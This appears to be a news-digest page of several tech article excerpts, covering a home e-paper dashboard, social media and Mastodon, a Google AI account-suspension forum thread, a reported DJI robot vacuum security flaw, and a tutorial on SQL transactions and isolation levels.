10 interesting stories served every morning and every evening.
TL;DR: Over the past decade, I’ve worked to build the perfect family dashboard system for our home, called Timeframe. Combining calendar, weather, and smart home data, it’s become an important part of our daily lives.
When Caitlin and I got married a decade ago, we set an intention to have a healthy relationship with technology in our home. We kept our bedroom free of any screens, charging our devices elsewhere overnight. But we missed our calendar and weather apps.
So I set out to build a solution to our problem. First, I constructed a Magic Mirror using an off-the-shelf medicine cabinet and LCD display with its frame removed. It showed the calendar and weather data we needed:
But the text was hard to read, especially during the day, as we get significant natural light in Colorado. At night, it glowed like any backlit display, sticking out like a sore thumb in our living space.
I then spent about a year experimenting with various jailbroken Kindle devices, eventually landing on a design with calendar and weather data on a pair of screens. The Kindles took a few seconds to refresh and flash the screen to reset the ink pixels, so they only updated every half hour. I designed wood enclosures and laser-cut them at the local library makerspace:
Software-wise, I built a Ruby on Rails app for fetching the necessary data from Google Calendar and Dark Sky. The Kindles woke up on a schedule, loading a URL in the app that rendered a PNG using IMGKit. The prototype proved e-paper was the right solution: it was unobtrusive regardless of lighting:
The Kindles were a hack, requiring constant tinkering to keep them working. It was time for a more reliable solution. I tried an OLED screen to see if the lack of a global backlight would be less distracting, but it wasn’t much better than the Magic Mirror:
So it was back to e-paper. I found a system of displays from Visionect, which came in 6”/10”/13”/32” sizes and could update every ten minutes for 2-3 months on a single charge:
The 32” screen used an outdated lower-contrast panel and its resolution was too low to render text smoothly. The smaller sizes used a contrasty, high-PPI panel. I ended up using a combination of them around the house: a 6” in the mudroom for the weather, a 13” (with its built-in magnetic backing) in the kitchen attached to the side of the fridge, and a 10” in the bedroom.
The Visionect displays required running custom closed-source software, either as a SaaS or locally with Docker. I opted for a local installation on the Raspberry Pi already running the Rails backend. I had my best results pushing images to the Visionect displays every five minutes in a recurring background job. It used IMGKit to generate a PNG and send it to the Visionect API, logic I extracted into visionect-ruby. This setup proved to be incredibly reliable, without a single failure for months at a time.
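The shape of that recurring job is easy to sketch. Below is a minimal Python approximation (the real implementation is a Ruby background job using IMGKit and visionect-ruby; the render and push callables here are hypothetical stand-ins):

```python
import time

INTERVAL = 300  # five minutes, matching the cadence described above

def seconds_until_next_push(now: float, interval: int = INTERVAL) -> float:
    """Seconds to sleep so pushes land on interval boundaries (:00, :05, ...)."""
    return interval - (now % interval)

def run_forever(render_png, push_to_display):
    """Recurring job: render the dashboard to a PNG and push it to the
    display API. Both callables are hypothetical stand-ins for IMGKit
    and the visionect-ruby client in the real (Ruby) implementation."""
    while True:
        time.sleep(seconds_until_next_push(time.time()))
        try:
            push_to_display(render_png())
        except Exception:
            pass  # a failed push simply waits for the next cycle
```

Aligning pushes to interval boundaries, rather than sleeping a fixed duration, keeps all displays refreshing in lockstep.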
Visiting friends often asked how they could have a similar system in their home. Three years after the initial prototype, I did my first market test with a potential customer. At their request, I experimented with different formats, including a month view on the 13” screen:
Unfortunately, the customer didn’t see enough value to justify the $1000 price tag (in 2019!) for the 13” device, let alone anything I’d charge for a subscription service. At around the same time, Visionect started charging a $7/mo per-device fee to run their backend software on premises with Docker, after years of it being free to use. I’d have needed to charge $10/month, if not more, for a single screen!
In late 2021, the Marshall Fire destroyed our home along with ~1,000 others. Our homeowner’s insurance gave us two years to rebuild, so we set off to redesign our home from the ground up.
Around the same time, Boox released the 25.3” Mira Pro, the first high-resolution option for large e-paper screens. Best of all, it could update in realtime! Unlike the Visionect devices, it was just a display with an HDMI port and needed to be plugged into power. A quick prototype powered by an old Mac Mini made it immediately obvious that it was a huge step forward in capability. The larger screen allowed for significantly more information to be displayed:
But the most compelling innovation was having the screen update in realtime. I added a clock, the current song playing on our Sonos system (using jishi/node-sonos-http-api) and the next-hour precipitation forecast from Dark Sky:
The working prototype was enough to convince me to build a place for it in the new house. We designed a “phone nook” on our main floor with an art light for the display:
We also ran power to two more locations for 13” Visionect displays, one in our bedroom and one by the door to our garage:
The real-time requirements of the Mira Pro immediately surfaced performance and complexity issues in the backend, prompting an almost complete rewrite.
While the Visionect system worked just fine with multi-second response times, long-polling every two seconds meant responses now had to be fast. To start, I moved away from generating images. The Visionect folks added the ability to render a URL directly in the backend, freeing up resources to serve the long-polling requests.
Most significantly, I started migrating towards Home Assistant (HA) as the primary data source. HA already had integrations for Google Calendar, Dark Sky (now Apple Weather), and Sonos, enabling me to remove over half of the code in the Timeframe codebase! I ended up landing a PR to Home Assistant to allow for the calendar behavior I needed, and will probably need to write a couple more before HA can be the sole data source.
With less data-fetching logic, I was able to remove both the database and Redis from the Rails application, a massive reduction in complexity. I now run the background tasks with Rufus Scheduler and save data fetching results with the Rails file store cache backend.
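The file-store cache pattern is simple enough to sketch in a few lines. This Python version is only an illustrative stand-in for the Rails file store cache (the directory location and JSON serialization are my assumptions):

```python
import json
import tempfile
import time
from pathlib import Path

# Hypothetical cache location, standing in for Rails' tmp/cache file store.
CACHE_DIR = Path(tempfile.gettempdir()) / "timeframe_cache"

def cache_fetch(key: str, ttl: int, fetch):
    """Return the cached value for `key` if it is younger than `ttl` seconds;
    otherwise call `fetch`, persist the result as JSON, and return it."""
    CACHE_DIR.mkdir(parents=True, exist_ok=True)
    path = CACHE_DIR / f"{key}.json"
    if path.exists() and time.time() - path.stat().st_mtime < ttl:
        return json.loads(path.read_text())
    value = fetch()
    path.write_text(json.dumps(value))
    return value
```

Because the cache lives on disk rather than in Redis, the app needs no external services beyond the scheduler process itself.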
In addition to data retrieval, I’ve also worked to move as much of the application logic as possible into Home Assistant. I now automatically display the status of any sensor whose name begins with sensor.timeframe, using a simple ICON,Label CSV format.
For example, the other day I wanted to have a reminder to start or schedule our dishwasher after 8pm if it wasn’t set to run. It took me about a minute to write a template sensor using the power level from the outlet:
{% if states('sensor.kitchen_dishwasher_switched_outlet_power')|float < 2 and now().hour > 19 %}
utensils,Run the dishwasher!
{% endif %}
In the month since adding the helper, it reminded me twice when I’d have otherwise forgotten. And I didn’t have to commit or deploy any code!
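On the display side, consuming the ICON,Label format takes only a few lines. A hedged Python sketch (the actual Timeframe app is Ruby, and the function name here is mine):

```python
def parse_status(sensor_value: str):
    """Split the 'ICON,Label' value produced by a sensor.timeframe_* template
    sensor. Returns (icon, label), or None when the sensor is blank, i.e. the
    house is in a healthy state and nothing should be displayed."""
    value = sensor_value.strip()
    if not value:
        return None
    icon, _, label = value.partition(",")
    return icon.strip(), label.strip()
```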
Since moving into our new home, we’ve come to rely on the real-time functionality much more significantly. Effectively, we’ve turned the top-left corner of the displays into a status indicator for the house. For example, it shows what doors are open/unlocked:
Or whether the laundry is done:
It has a powerful function: if the status on the display is blank, the house is in a “healthy” state and does not need any attention. This approach of only showing information that is relevant in a given moment flies in the face of how most smart homes approach communicating their status:
The single status indicator removes the need to scan an entire screen. This change in approach is possible because of one key difference: we have separated the control of our devices from the display of their status.
I continue to receive significant interest in the project and remain focused on bringing it to market. A few key issues remain:
While I have made significant progress in handling runtime errors gracefully, I have plenty to learn about creating embedded systems that do not need maintenance.
There are still several data sources I fetch directly outside of Home Assistant. Once HA is the sole source of data, I’ll be able to have Timeframe be a Home Assistant App, making it significantly easier to distribute.
The current hardware setup is not ready for adoption by the average consumer. The 25” Boox display is excellent but costs about $2000! It also doesn’t include the hardware needed to drive the display. There are a couple of potential options to consider, such as Android-powered devices from Boox and Philips or low-cost options from TRMNL.
Building Timeframe continues to be a passion of mine. While my day job has me building software for over a hundred million people, it’s refreshing to work on a project that improves my family’s daily life.
...
Read the original on hawksley.org »
When web-based social networks started flourishing nearly two decades ago, they were genuinely social networks. You would sign up for a popular service, follow people you knew or liked and read updates from them. When you posted something, your followers would receive your updates as well. Notifications were genuine. The little icons in the top bar would light up because someone had sent you a direct message or engaged with something you had posted. There was also, at the beginning of this millennium, a general sense of hope and optimism around technology, computers and the Internet. Social networking platforms were one of the services that were part of what was called Web 2.0, a term used for websites built around user participation and interaction. It felt as though the information superhighway was finally reaching its potential. But sometime between 2012 and 2016, things took a turn for the worse.
First came the infamous infinite scroll. I remember feeling uneasy the first time a web page no longer had a bottom. Logically, I knew very well that everything a browser displays is a virtual construct. There is no physical page. It is just pixels pretending to be one. Still, my brain had learned to treat web pages as objects with a beginning and an end. The sudden disappearance of that end disturbed my sense of ease.
Then came the bogus notifications. What had once been meaningful signals turned into arbitrary prompts. Someone you followed had posted something unremarkable and the platform would surface it as a notification anyway. It didn’t matter whether the notification was relevant to me. The notification system stopped serving me and started serving itself. It felt like a violation of an unspoken agreement between users and services. Despite all that, these platforms still remained social in some diluted sense. Yes, the notifications were manipulative, but they were at least about people I actually knew or had chosen to follow. That, too, would change.
Over time, my timeline contained fewer and fewer posts from friends and more and more content from random strangers. Using these services began to feel like standing in front of a blaring loudspeaker, broadcasting fragments of conversations from all over the world directly in my face. That was when I gave up on these services. There was nothing social about them anymore. They had become attention media. My attention is precious to me. I cannot spend it mindlessly scrolling through videos that have neither relevance nor substance.
But where one avenue disappeared, another emerged. A few years ago, I stumbled upon Mastodon and it reminded me of the early days of Twitter. Back in 2006, I followed a small number of folks of the nerd variety on Twitter and received genuinely interesting updates from them. But when I log into the ruins of those older platforms now, all I see are random videos presented to me for reasons I can neither infer nor care about. Mastodon, by contrast, still feels like social networking in the original sense. I follow a small number of people I genuinely find interesting and I receive their updates and only their updates. What I see is the result of my own choices rather than a system trying to capture and monetise my attention. There are no bogus notifications. The timeline feels calm and predictable. If there are no new updates from people I follow, there is nothing to see. It feels closer to how social networks used to work originally. I hope it stays that way.
...
Read the original on susam.net »
I’m seeking assistance regarding a sudden restriction on my Google AI Ultra account that has persisted for three days. I received no prior warnings or notifications regarding a potential violation.
The only recent change in my workflow was connecting Gemini models via OpenClaw OAuth. If third-party integrations are the issue, I would expect the platform to block the integration rather than restrict a paid account ($249/mo) without communication.
I have already emailed support but haven’t received a response. Additionally, I found that accessing GCC support requires an additional fee, which seems unreasonable given the existing subscription cost. I WOULD LOVE TO GET THIS RESOLVED!!
Thank you for bringing this to our attention. We have shared the issue to our internal teams for a thorough investigation.
To ensure our engineering team can investigate and resolve these issues effectively, we highly recommend filing bug reports directly through the Antigravity in-app feedback tool. You can do this by navigating to the top-right corner of the interface, clicking the Feedback icon, and selecting Report Issue.
Sir, I am logged out of my account and I can’t even get into the app!! This is so frustrating..
[UPDATE] Day 4, and still total silence from support. I’ve received zero acknowledgement through official channels or the feedback center. I am now in the process of moving all my data and subscriptions off Google. It’s staggering that an organization of this scale can be this unresponsive to a widespread issue.
I contacted the Google Cloud Support via “GCP Account Suspension Inquiry”. They told me to contact Google One Support, because the error is tied to the personal subscription, not to a “Google Cloud project billing account”. Google One support told me to contact Google Cloud support
From emails “gemini-code-assist-user-feedback” or “antigravity-support” still no answer.
And it happens after some days after I bought the subscription for an year…
any update? please tell us how did u solved it!
Nope, still restricted, tried to escalate by Google One, But they can’t help with the problem either…
Same issue and same sentiment and I cancelled and removed billing for all Google products. Absolutely shameful treatment of paying customers. I emailed each of the contact emails for Antigravity and gemini-code-assist without reply. Unfortunately I prepaid for a year so it looks like I’ll have to sue a trillion-dollar company just to get the measly fee?
I have tried to contact everyone I could. And you all know how disgusting their supports are. I am totally disappointed with their customer service. After 3 weeks waiting, the result is that they cannot restore my account. I guess it is time to move on to Codex or Claude Code. Below is their reply after “full investigation by the internal team“:
”Thank you for your continued patience as we have thoroughly investigated your account access issue. Please be assured that we conducted a comprehensive investigation, exploring every possible avenue to restore your access.
Our product engineering team has confirmed that your account was suspended from using our Antigravity service. This suspension affects your access to the Gemini CLI and any other service that uses the Cloud Code Private API.
Our investigation specifically confirmed that the use of your credentials within the third-party tool “open claw” for testing purposes constitutes a violation of the Google Terms of Service [1]. This is due to the use of Antigravity servers to power a non-Antigravity product.
I must be transparent and inform you that, in accordance with Google’s policy, this situation falls under a zero tolerance policy, and we are unable to reverse the suspension. I am truly sorry to share this difficult news with you.”
Ok so basicaly, there’s no way we can restore our accounts to use Antigravity anymore yeah? this is unexpected, but until we can figure out how to resolve this issue, I’ll just subscribed using different account
I’m in the same situation…
Hi @Abhijit_Pramanik , could you please provide some help? This silence is unbearable.
Gemini Disabled on Antigravity IDE, How to Restore Access?
I’m in contact with Google One but their actions are no help at all, for almost a week they haven’t done anything, they only asked for screenshots/recordings of the login attempt.
Why is there silence from Google? What is the user supposed to do? Create a new account and buy a new PRO/ULTRA, or what? Any information at all?!
I’ve got ban and the only difference from vanilla IDE experience was antigravity-cockpit extension. No reply to my appeal email last 12 hours.
I’m subscribing the AI Pro and just integrated Gemini to OpenCode yesterday. After a just day use, my account is suspended without any warnings. Simply the API returns 403 error to my OpenCode and Gemini CLI like this:
Failed to login. Message: This service has been disabled in this account for violation of Terms of Service. If you believe this is an error, contact gemini-code-assist-user-feedback@google.com.
I emailed to the contact this morning but didn’t get any response yet.
If this is indeed the case, I find it utterly absurd. It seems Google’s response is woefully inadequate; I should explore Claude or other alternatives.
Quick update for everyone stuck in this 403 loop: I just spent the last 8 days fighting through Tier 1 support. Google One support finally admitted on record it’s a ‘known WAF bug’, but then literally routed me to Android App Developer support because they have no backend access to fix it.
The entire support flowchart is completely broken, and they are still billing us $250/mo for bricked accounts. I just documented the entire Kafkaesque support loop over on the google_antigravity subreddit. If you are stuck in this same Catch-22, go search for that post over there and share your Trajectory IDs in the comments so we can get some actual engineering eyes on this mass ban wave.
Hi @K8L, just wanted to share some context regarding this situation as I see you are waiting for a response.
Yesterday, Abhijit actually posted a brief statement acknowledging these 403 ToS issues, noting that the internal team was ‘prioritizing a resolution.’ However, the message was deleted just a few minutes later.
Hoping for some transparency, I left a single, polite comment asking for clarification on why the update was removed. Surprisingly, my forum account was banned shortly after posting that question.
Currently, there seems to be no official communication regarding these 403 errors, although we can see active replies being made to other unrelated threads on the forum.
This situation is quite concerning for us as developers. The automated system is still triggering these mass bans daily during fixed time windows, without any warning and seemingly without a review of the current process.
Fingers crossed this message doesn’t get taken down and my account survives long enough for you guys to read it, haha.
Facing this issue too, I wrote an email to gemini-code-assist-user-feedback@google.com “eight days ago”, and still got no response today. So disappointed
My account (pro) was also bricked for calling Gemini model from pi harness two times. No response from support and it’s been four days.
...
Read the original on discuss.ai.google.dev »
All the fun of short-form video, none of the corporate control.
Loops is federated, open-source, and designed to give power back to creators and communities across the social web. Build your community on a platform that can’t lock you in.
...
Read the original on joinloops.org »
A software engineer’s earnest effort to steer his new DJI robot vacuum with a video game controller inadvertently granted him a sneak peek into thousands of people’s homes.
While building his own remote-control app, Sammy Azdoufal reportedly used an AI coding assistant to help reverse-engineer how the robot communicated with DJI’s remote cloud servers. But he soon discovered that the same credentials that allowed him to see and control his own device also provided access to live camera feeds, microphone audio, maps, and status data from nearly 7,000 other vacuums across 24 countries. The backend security bug effectively exposed an army of internet-connected robots that, in the wrong hands, could have turned into surveillance tools, all without their owners ever knowing.
Luckily, Azdoufal chose not to exploit that access. Instead, he shared his findings with The Verge, which quickly contacted DJI to report the flaw. While DJI tells Popular Science the issue has been “resolved,” the episode underscores what cybersecurity experts have long warned: internet-connected robots and other smart home devices present attractive targets for hackers.
As more households adopt home robots, (including newer, more interactive humanoid models) similar vulnerabilities could become harder to detect. AI-powered coding tools, which make it easier for people with less technical knowledge to exploit software flaws, potentially risk amplifying those worries even further.
The robot in question is the DJI Romo, an autonomous home vacuum that first launched in China last year and is currently expanding to other countries. It retails for around $2,000 and is roughly the size of a large terrier or a small fridge when docked at its base station. Like other robot vacuums, it’s equipped with a range of sensors that help it navigate its surroundings and detect obstacles. Users can schedule and control it via an app, but it is designed to spend most of its time cleaning and mopping autonomously.
In order for the Romo, or really any modern autonomous vacuum, to function it needs to constantly collect visual data from the building it is operating in. It also needs to understand specific details about what makes, say, a kitchen different from a bedroom, so it can distinguish between the two. Some of that sensor data is stored remotely on DJI’s servers rather than on the device itself. For Azdoufal’s DIY controller idea to work, he would need a way for his app to communicate with DJI’s servers and extract a security token that proves he is the owner of the robot.
Rather than just verifying a single token, the servers granted access to a small army of robots, essentially treating him as the owner of each. That slip-up meant Azdoufal could tap into their real-time camera feeds and activate their microphones. He also claims he could compile 2D floor plans of the homes the robots were operating in. A quick look at the robots’ IP addresses also revealed their approximate locations. None of this, Azdoufal insists, amounts to “hacking” on his part. He simply stumbled upon a major security issue.
“DJI identified a vulnerability affecting DJI Home through internal review in late January and initiated remediation immediately,” DJI told Popular Science. “The issue was addressed through two updates, with an initial patch deployed on February 8 and a follow-up update completed on February 10. The fix was deployed automatically, and no user action is required.”
The company went on to say its plans to “continue to implement additional security enhancements” but did not specify what those may entail.
The DJI security concerns come amid a period of growing unease generally about the surveillance capabilities of smart home technology. Earlier this month, Ring camera owners flooded social media after a controversial advertisement for the company’s pet-finding “search party” feature was interpreted by some as a Trojan horse for broader monitoring. Around the same time, reports that Google was able to retrieve video footage from a Nest Doorbell camera to assist in an abduction investigation (despite earlier indications that the footage had been deleted) reignited debate over how much control consumers truly have over their sensitive data.
On top of that, lawmakers from both political parties in the US have spent years warning that DJI and other Chinese tech manufacturers pose a unique security threat. The evidence for those claims is murky, but it has nonetheless helped justify the banning of certain Chinese-made products.
The irony of many robot vacuums and other smart home devices is that, as a category, they have a long history of questionable security practices, despite the fact that they operate in some of our most private spaces. All signs suggest that the average person will soon welcome more cameras and microphones into their homes, not fewer. As of 2020, market research firm Parks Associates estimates that 54 million U. S. households had at least one smart home device installed. Other surveys show that those who already have one often want more.
The specific types of devices entering homes are also becoming more sophisticated. Though still early, Tesla, Figure, and other companies are racing to build human-like autonomous robots that can live in a home and perform chores. A company called 1X is already retailing one of these humanoids, claiming it can clean dishes and crack walnuts—albeit often with some help from a human. Eventually though, for any of these at-home robot servants to function effectively, they will need unprecedented access to the intimate details of their owners’ homes. For a stalker or hacker, that represents a potential goldmine.
In the end, Azdoufal found himself wrapped up in this mess even though all he wanted to do was drive his robot around with a joystick. On that front, mission accomplished.
...
Read the original on www.popsci.com »
“I don’t want to use the word ‘frustrated,’ because he understands he has plenty of alternatives, but he’s curious as to why they haven’t… I don’t want to use the word ‘capitulated,’ but why they haven’t capitulated,” he said.
...
Read the original on www.bbc.com »
Last week I had to diagnose a bug in an open source library I maintain. The issue was gnarly enough that I couldn’t find it right away, but then I thought: if I set a breakpoint here and fire up the debugger, I will likely find the root cause very soon… and then proceed to mercilessly destroy it!
So I rolled up my sleeves, set the breakpoint, fired up the debugger, and… saw the program run to completion without interruptions whatsoever. My breakpoint had been ignored, even though I knew for certain that the line of code in question must have been executed (I double-checked just to be sure).
Since I was in “problem solving mode”, I ignored the debugger issue and started thinking of other approaches to diagnosing it. Prey to my tunnel vision, I modified the code to log potentially interesting data, but it didn’t yield the insights I was hoping for. How frustrating!
My fingertips itched to write even more troubleshooting code when it suddenly dawned on me: just fix the darn debugger already! Sure, it might feel slower, but it will give you the ability to see what you need to see, and then actually solve the problem.
So I fixed the debugger (it turned out to be a one-line configuration change), observed the program’s behavior in more detail, and used that knowledge to solve the issue.
What a paradox, I realized afterwards. The very desire to fix the bug prevented me from seeing I had to fix the tool first, and made me less effective in my bug hunt. This blog post is a reminder to myself, and to every bug-hungry programmer out there: fix your tools! They will do wonders for you.
...
Read the original on ochagavia.nl »
PlanetScale Postgres is the fastest way to run Postgres in the cloud. Plans start at just $5 per month.
Transactions are fundamental to how SQL databases work. Trillions of transactions execute every single day, across the thousands of applications that rely on SQL databases.
A transaction is a sequence of actions that we want to perform on a database as a single, atomic operation. An individual transaction can include a combination of reading, creating, updating, and removing data.
In MySQL and Postgres, we begin a new transaction with begin; and end it with commit;. Between these two commands, any number of SQL queries that search and manipulate data can be executed.
The example above shows a transaction begin, three query executions, then the commit. You can hit the ↻ button to replay the sequence at any time. The act of committing is what atomically applies all of the changes made by those SQL statements.
There are some situations where transactions do not commit. This is sometimes due to unexpected events in the physical world, like a hard drive failure or power outage. Databases like MySQL and Postgres are designed to correctly handle many of these unexpected scenarios using disaster recovery techniques. Postgres, for example, handles this via its write-ahead log (WAL).
There are also times when we want to intentionally undo a partially-executed transaction. This happens when, midway through a transaction, we encounter missing or unexpected data or receive a cancellation request from a client. For this, databases support the rollback; command.
In the example above, the transaction made several modifications to the database, but those changes were isolated from all other ongoing queries and transactions. Before the transaction committed, we decided to rollback, undoing all changes and leaving the database unaltered by this transaction.
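These commit and rollback semantics are easy to reproduce with any SQL database. Here’s a sketch using Python’s built-in sqlite3 module (SQLite rather than MySQL or Postgres, but the transaction commands behave the same way):

```python
import sqlite3

# isolation_level=None disables the driver's implicit transactions,
# so BEGIN/COMMIT/ROLLBACK are issued exactly as written.
conn = sqlite3.connect(":memory:", isolation_level=None)
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")

# A committed transaction applies all of its changes atomically.
conn.execute("BEGIN")
conn.execute("INSERT INTO users VALUES (1, 'ben')")
conn.execute("INSERT INTO users VALUES (2, 'liz')")
conn.execute("COMMIT")

# A rolled-back transaction leaves the database as if it never began.
conn.execute("BEGIN")
conn.execute("DELETE FROM users")
conn.execute("ROLLBACK")

print(conn.execute("SELECT COUNT(*) FROM users").fetchone()[0])  # 2
```

The DELETE inside the second transaction removed both rows, yet after the rollback the table still contains them.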
By the way, you can use the menu below to change the speed of all the sessions and animations in this article. If the ones above were going too fast or too slow for your liking, fix that here!
A key reason transactions are useful is to allow execution of many queries simultaneously without them interfering with each other. Below you can see a scenario with two distinct sessions connected to the same database. Session A starts a transaction, selects data, updates it, selects again, and then commits. Session B selects that same data twice during a transaction and again after both of the transactions have completed.
Session B does not see the name update from ben to joe until after Session A commits the transaction.
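You can reproduce this two-session behavior with SQLite in WAL mode, where readers see a stable committed snapshot and don’t block the writer (again a stand-in for MySQL or Postgres):

```python
import os
import sqlite3
import tempfile

path = os.path.join(tempfile.mkdtemp(), "demo.db")

# Session A: create the table and commit a starting row.
a = sqlite3.connect(path, isolation_level=None)
a.execute("PRAGMA journal_mode=WAL")  # readers don't block the writer
a.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
a.execute("INSERT INTO users VALUES (1, 'ben')")

# Session B: a second, independent connection to the same database.
b = sqlite3.connect(path, isolation_level=None)

a.execute("BEGIN")
a.execute("UPDATE users SET name = 'joe' WHERE id = 1")

# B still sees the last committed value while A's transaction is open.
during = b.execute("SELECT name FROM users WHERE id = 1").fetchall()[0][0]

a.execute("COMMIT")

# Once A commits, B's next statement sees the update.
after = b.execute("SELECT name FROM users WHERE id = 1").fetchall()[0][0]
print(during, after)
```

During A’s open transaction, B reads “ben”; only after the commit does B read “joe”.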
Consider the same sequence of events, except instead of committing the transaction in Session A, we rollback.
The second session never sees the effect of any changes made by the first, due to the rollback. This is a nice segue into another important concept in transactions: Consistent reads.
During a transaction’s execution, we would like it to have a consistent view of the database. This means that even if another transaction simultaneously adds, removes, or updates information, our transaction should get its own isolated view of the data, unaffected by these external changes, until the transaction commits.
MySQL and Postgres both support this capability when operating in REPEATABLE READ mode (plus all stricter modes, too). However, they each take different approaches to achieving this same goal.
Postgres handles this with multi-versioning of rows. Every time a row is inserted or updated, it creates a new row along with metadata to keep track of which transactions can access the new version. MySQL handles this with an undo log. Changes to rows immediately overwrite old versions, but a record of modifications is maintained in a log file, in case they need to be reconstructed.
Let’s take a close look at each.
Below, you’ll see a simple user table on the left and a sequence of statements in Session A on the right. Click the “play sessions” button and watch what happens as the statements get executed.
* An update is made to the user with ID 4, changing the name from “liz” to “aly”. This causes a new version of the row to be created, while the other is maintained.
* The old version of the row had its xmax set to 10 (the ID of the updating transaction)
* The new version of the row had its xmin set to 10 (the same transaction ID)
* The transaction commits, making the update visible to the rest of the database
But now we have two versions of the row with ID = 4. Ummm… that’s odd! The key here is xmin and xmax.
xmin stores the ID of the transaction that created a row version, and xmax is the ID of the transaction that caused a replacement row to be created. Postgres uses these to determine which row version each transaction sees.
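You can inspect these yourself: Postgres exposes xmin and xmax as hidden system columns on every table, and they appear only when selected explicitly.

```sql
-- System columns are not part of SELECT *, so name them directly
SELECT xmin, xmax, id, name FROM users;
```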
Let’s look at Session A again, but this time with an additional Session B running simultaneously.
Before the commit, Session B could not see Session A’s modification: it sees the name as “liz” while Session A sees “aly” within the transaction. At this stage, this has nothing to do with xmin and xmax; other transactions simply cannot see uncommitted data. After Session A commits, Session B sees the new name “aly”, because the row version created by transaction 10 is now committed and visible to it.
If the transaction instead gets a rollback, those row changes do not get applied, leaving the database in a state as if the transaction never began in the first place.
This is a simple scenario. Only one of the transactions modifies data. Session B only does select statements! When both simultaneously modify data, each one will be able to “see” the modifications it made, but these changes won’t bleed out into other transactions until commit. Here’s an example where each transaction selects data, updates data, selects again, commits, and finally both do a final select.
The concurrent transactions cannot see each other’s changes until the data is committed. The same mechanisms are used to control data visibility when there are hundreds of simultaneous transactions on busy Postgres databases.
Before we move on to MySQL, one more important note. What happens to all those duplicated rows? Over time, we can end up with thousands of row versions that are no longer needed. Postgres does several things to mitigate this issue, but I’ll focus on the VACUUM FULL command. When run, this purges versions of rows that are old enough that no transaction will need them going forward, compacting the table in the process.
When the VACUUM FULL command executes, all unused row versions are eliminated and the gaps in the table are compacted, reclaiming the unused space.
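Run by hand, that looks like the following. Note that VACUUM FULL rewrites the whole table and holds an exclusive lock while doing so; routine cleanup is normally handled in the background by autovacuum, which reclaims dead versions without locking the table.

```sql
-- Rewrite the table, discarding row versions no transaction can still see
VACUUM FULL users;
```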
MySQL achieves the consistent read behavior using a different approach. Instead of keeping many copies of each row, MySQL immediately overwrites old row data with new row data when modified. This means it requires less maintenance over time for the rows (in other words, we don’t need to do vacuuming like Postgres).
However, MySQL still needs the ability to show different versions of a row to different transactions. For this, MySQL uses an undo log — a log of recently-made row modifications, allowing a transaction to reconstruct past versions on-the-fly.
Notice how each MySQL row has two metadata columns (in blue). These keep track of the ID of the transaction that updated the row most recently (xid), and a reference to the most recent modification in the undo log (ptr).
When there are simultaneous transactions, transaction A may clobber the version of a row that transaction B needs to see. Transaction B can see the previous version(s) of the row by checking the undo log, which stores old values so long as any running transaction may need to see it.
There can even be several undo log records in the log for the same row simultaneously. In such a case, MySQL will choose the correct version based on transaction identifiers.
The idea of repeatable reads is important for databases, but it is just one of several isolation levels that databases like MySQL and Postgres support. This setting determines how “protected” each transaction is from seeing data that other simultaneous transactions are modifying. Adjusting it gives the user control over the tradeoff between isolation and performance.
Both MySQL and Postgres have four levels of isolation. From strongest to weakest, these are: Serializable, Repeatable Read, Read Committed, and Read Uncommitted.
Stronger levels of isolation provide more protections from data inconsistency issues across transactions, but come at the cost of worse performance in some scenarios.
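Both databases let you choose the level per transaction, though the syntax differs slightly:

```sql
-- Postgres: set the level when opening the transaction
BEGIN ISOLATION LEVEL SERIALIZABLE;
-- ... statements ...
COMMIT;

-- MySQL: set the level for the next transaction, then start it
SET TRANSACTION ISOLATION LEVEL SERIALIZABLE;
START TRANSACTION;
-- ... statements ...
COMMIT;
```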
Serializable is the strongest. In this mode, all transactions behave as if they were run in a well-defined sequential order, even if in reality many ran simultaneously. This is accomplished via complex locking and waiting.
The other three gradually loosen the strictness, and can be described by the undesirable phenomena they allow or prohibit.
A phantom read occurs when a transaction runs the same SELECT multiple times but sees different results on a later run, typically because another transaction inserted and committed new rows in between.
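A sketch of such a timeline with two clients, using an illustrative age column and assuming an isolation level that permits phantoms, such as READ COMMITTED:

```sql
-- Client 1
BEGIN;
SELECT count(*) FROM users WHERE age > 30;   -- 2 rows match

-- Client 2 (autocommit: the insert commits immediately)
INSERT INTO users (name, age) VALUES ('sam', 45);

-- Client 1
SELECT count(*) FROM users WHERE age > 30;   -- 3 rows: a phantom appeared
COMMIT;
```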
The next strictest isolation level after serializable is repeatable read. Under the SQL standard, the repeatable read level allows phantom reads, though Postgres’s implementation prevents them even at this level.
The next phenomenon, the non-repeatable read, happens when a transaction reads a row and later re-reads it, finding changes made by another, already-committed transaction. This is dangerous because we may have already made assumptions about the state of our database, but that data has changed under our feet.
The read committed isolation level, the next after repeatable read, allows both non-repeatable reads and phantom reads to occur. The tradeoff is slightly better transaction performance.
The last and arguably worst phenomenon is the dirty read: a transaction sees data written by another simultaneously running transaction that has not yet committed. This is really bad! In most cases, we never want to see uncommitted data from other transactions.
The loosest isolation level, read uncommitted, allows for dirty reads and the other two described above. It is the most dangerous and also most performant mode.
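A sketch of a dirty read, using a hypothetical accounts table. Note that Postgres never actually allows this: requesting READ UNCOMMITTED there silently behaves like READ COMMITTED, while MySQL does permit it.

```sql
-- Transaction 1
BEGIN;
UPDATE accounts SET balance = balance - 100 WHERE id = 1;  -- not committed yet

-- Transaction 2 (READ UNCOMMITTED)
SELECT balance FROM accounts WHERE id = 1;  -- sees the uncommitted balance

-- Transaction 1
ROLLBACK;  -- Transaction 2 acted on data that never officially existed
```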
The keen-eyed observer will notice that I have ignored a particular scenario, quite on purpose, up to this moment. What if two transactions need to modify the same row at the same time?
Precisely how this is handled depends on both (A) the database system and (B) the isolation level. To keep the discussion simple, we’ll focus on how this works for the strictest (SERIALIZABLE) level in Postgres and MySQL. Yet again, the world’s two most popular relational databases take very different approaches here.
A lock is a software mechanism for giving ownership of a piece of data to one transaction (or a set of transactions). Transactions obtain a lock on a row when they need to “own” it without interruption. When the transaction is finished using the rows, it releases the lock to allow other transactions access.
Though there are many types of locks in practice, the two main ones you need to know about here are shared locks and exclusive locks.
A shared (S) lock can be obtained by multiple transactions on the same row simultaneously. Typically, transactions will obtain shared locks on a row when reading it, because multiple transactions can do so simultaneously safely.
An exclusive (X) lock can only be owned by one transaction for any given row at any given time. When a transaction requests an X lock, no other transactions can have any type of lock on the row. These are used when a transaction needs to write to a row, because we don’t want two transactions simultaneously messing with column values!
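Both lock types can also be requested explicitly in queries. FOR SHARE is the spelling in Postgres and MySQL 8.0; older MySQL used LOCK IN SHARE MODE.

```sql
BEGIN;
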